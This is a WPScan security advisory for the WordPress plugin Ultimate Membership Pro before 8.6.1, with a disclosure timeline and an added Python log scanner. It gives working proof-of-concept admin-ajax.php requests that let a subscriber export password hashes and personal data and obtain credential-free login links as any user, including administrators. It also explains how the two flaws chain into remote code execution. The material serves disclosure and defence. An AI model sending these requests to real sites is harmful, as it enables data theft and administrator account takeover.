Ultimate Membership Pro < 8.6.1 - Multiple Critical Vulnerabilities



Description
Multiple critical vulnerabilities in Ultimate Membership Pro allow an authenticated user with a low-privilege account (such as a subscriber) to export site data containing PII (emails, IP addresses, password hashes, usernames, User-Agent strings and so on) and to log in as any registered user, including administrators, on a default installation. Both issues stem from missing authorisation checks on the plugin's admin-ajax.php handlers: WordPress dispatches any `action=` value to the matching `wp_ajax_{action}` hook for every logged-in user, so a handler that does not check capabilities itself is reachable by subscribers. Administrator login in turn gives Remote Code Execution on a default installation, since the administrator role can upload and activate plugin code.

Edit (WPScanTeam):
February 3rd, 2020 - Report Received & Envato Contacted
February 4th, 2020 - Envato Investigating
February 4th, 2020 - v8.6.1 released, devs replied (via Envato) that the issues were due to the nulled plugin used by the researcher. We can confirm that the issues were valid and not due to a nulled plugin as claimed. Furthermore, the attempted fixes are not sufficient and Envato has been notified again.
Proof of Concept
All vulnerabilities require at least a subscriber account.
===============================================================================================================================
1. Export Settings, Postmeta And User Data, Including Password Hashes And User Roles, As A Low-Privileged User Such As A Subscriber (versions <= 8.6)
===============================================================================================================================


-------------------------------------------
Request Headers To Dump Export File (Start)
-------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_make_export_file&import_users=1&import_settings=1&import_postmeta=1
-----------------------------------------
Request Headers To Dump Export File (End)
-----------------------------------------


The response to the above request returns the URL of an XML export file containing the sensitive data, e.g.:
http://example.com/wordpress/wp-content/plugins/indeed-membership-pro/export.xml

The file is written under the plugin directory as a static file, so once it exists it is served by the web server without any authentication to anyone who knows the path; after updating, check whether an export.xml is still present at that path and remove it. The XML file contains the contents of the following tables:

wp_users
wp_usermeta
wp_ihc_orders
wp_ihc_orders_meta
wp_ihc_security_login
wp_ihc_user_levels
wp_ihc_user_logs
wp_indeed_members_payments
wp_options
wp_ihc_notifications
wp_ihc_invitation_codes
wp_ihc_coupons
wp_ihc_debug_payments
wp_ihc_gift_templates
wp_ihc_taxes
wp_postmeta


===================================================================================================
2. Log In As Any Registered User, Including Administrators, Knowing Only Their Username Or ID (versions 7.3 to 8.6)
===================================================================================================


-------------------------------------------------
Request Headers To Login Through Username (Start)
-------------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_generate_direct_link&username=admin
-----------------------------------------------
Request Headers To Login Through Username (End)
-----------------------------------------------


The response to the above request contains a link which, when opened, logs the browser in as the target user (here the administrator) without requiring any credentials, e.g.:
http://example.com/wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791


-------------------------------------------
Request Headers To Login Through ID (Start)
-------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_generate_direct_link_by_uid&uid=1
-----------------------------------------
Request Headers To Login Through ID (End)
-----------------------------------------


The response to the above request again contains a direct-login link for the target user, e.g.:
http://example.com/wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791


The two issues chain together: the usernames, IDs and roles of administrators can be read from the export.xml produced by the first vulnerability, so an attacker does not need to guess a target before requesting a direct-login link.
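As an added example (not part of the original advisory and not code from the plugin), the following Python script scans web-server access logs in Apache/nginx combined format for the two traces this PoC leaves: a GET of export.xml under the plugin directory (vulnerability 1) and a GET of a ?ihc_action=dl&token=... direct-login link (vulnerability 2). The action= parameter of the admin-ajax.php POST sits in the request body and is not recorded in an access log, so an admin-ajax.php POST from the same client shortly before an indicator is used only as corroborating context. The log lines, client addresses and the 120-second correlation window are constructed for illustration.

```python
"""Flag access-log traces consistent with the Ultimate Membership Pro PoC.

Added example; not the advisory's or the plugin's own code. Input is
Apache/nginx "combined" access-log text; output is a list of findings.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Paths from the PoC: the export file dropped into the plugin directory and
# the AJAX endpoint both requests are sent to.
EXPORT_PATH = "/wp-content/plugins/indeed-membership-pro/export.xml"
AJAX_PATH = "/wp-admin/admin-ajax.php"

# Constructed sample log (not real traffic). 203.0.113.7 follows the PoC's
# request order; 198.51.100.20 is ordinary activity and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Feb/2020:10:14:02 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 143 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2020:10:14:03 +0000] "GET /wordpress/wp-content/plugins/indeed-membership-pro/export.xml HTTP/1.1" 200 918233 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2020:10:15:41 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2020:10:15:44 +0000] "GET /wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.20 - - [05/Feb/2020:10:16:10 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
198.51.100.20 - - [05/Feb/2020:10:16:30 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": url.path,
        "query": parse_qs(url.query),
        "status": int(m.group("status")),
    }


def classify(entry):
    """Return the indicator name for a parsed entry, or None if it is benign."""
    if entry["method"] == "GET" and entry["path"].endswith(EXPORT_PATH):
        return "export_file"    # PoC 1: dump containing wp_users hashes and roles
    if "dl" in entry["query"].get("ihc_action", []) and "token" in entry["query"]:
        return "direct_login"   # PoC 2: passwordless login link being redeemed
    if entry["method"] == "POST" and entry["path"].endswith(AJAX_PATH):
        return "ajax_post"      # action= is in the body: context only, never alone
    return None


def analyse(log_text, window_seconds=120):
    """Scan the log and return findings in log order. A finding is marked as
    chained (severity high) when the same client POSTed to admin-ajax.php
    within window_seconds beforehand, which is the PoC's request order."""
    window = timedelta(seconds=window_seconds)
    last_ajax = {}      # ip -> time of most recent admin-ajax.php POST
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind == "ajax_post":
            last_ajax[entry["ip"]] = entry["time"]
        elif kind is not None:
            prior = last_ajax.get(entry["ip"])
            chained = prior is not None and timedelta(0) <= entry["time"] - prior <= window
            findings.append({
                "ip": entry["ip"],
                "time": entry["time"].isoformat(),
                "indicator": kind,
                "status": entry["status"],
                "token": entry["query"].get("token", [None])[0],
                "preceded_by_ajax_post": chained,
                "severity": "high" if chained else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Run it against a real log with `analyse(open("access.log").read())`; a successful (200) GET of export.xml is worth treating as a disclosure of every table listed above regardless of whether an admin-ajax.php POST was seen, because the file stays fetchable for as long as it exists on disk.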

Affects Plugin

Fixed in version 8.6.1

References

URL https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
URL https://blog.wpscan.org/wpvulndb/report/2020/03/06/ultimate-membership-pro-recent-vulnerabilities-breakdown.html

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Noman Riffat
Submitter Noman Riffat
Submitter Twitter nomanriffat
Verified No
WPVDB ID 10061

Timeline

Publicly Published 2020-02-06
Added 2020-02-06
Last Updated 2020-03-07
